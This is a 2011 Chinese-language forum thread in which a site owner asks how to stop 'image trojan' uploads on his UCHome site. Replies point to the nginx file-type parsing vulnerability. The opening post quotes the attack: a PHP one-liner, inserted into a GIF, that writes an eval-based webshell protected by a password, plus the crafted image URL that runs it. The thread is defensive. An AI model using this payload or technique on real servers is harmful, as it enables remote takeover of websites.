如何防止上传图片木马？

qbit · 发表于 2011-1-13 18:57:17

最近发现我的网站被人上传了很多木马，删也删不完，最后查询日志，发现有人通过uchome上传图片木马

正常图片一张
使用c32以十六进制打开，在空白处填充<?php fputs(fopen('./a.php',"w"),"<?php eval(\$_POST[a]);?>")?>

访问图片地址url=http://site/attachment/132_104417_42e6fe3ddc3c19.gif/1.php，会在attachment目录生成一句话a.php。连接密码为a

http://www.hackline.net/a/special/wlgf/jbst/2010/0522/4026.html
这个太危险了，怎么防止别人上传这类图片？

qbit · 发表于 2011-1-13 19:00:33

就是这张图片。。。

kuaigou8 · 发表于 2011-1-13 19:12:41

帮你顶，我不会

qbit · 发表于 2011-1-13 19:53:20

。。。自己百度到解决办法了。。
nginx文件类型错误解析漏洞
http://www.80sec.com/nginx-securit.html
http://www.laruence.com/2010/05/20/1495.html
大家可以测测自己的服务器有没有这个问题。。。

ICNsea · 发表于 2011-1-13 20:26:05

聪明的孩子哈哈

		自动登录	找回密码
密码			立即注册

[已解决] 如何防止上传图片木马？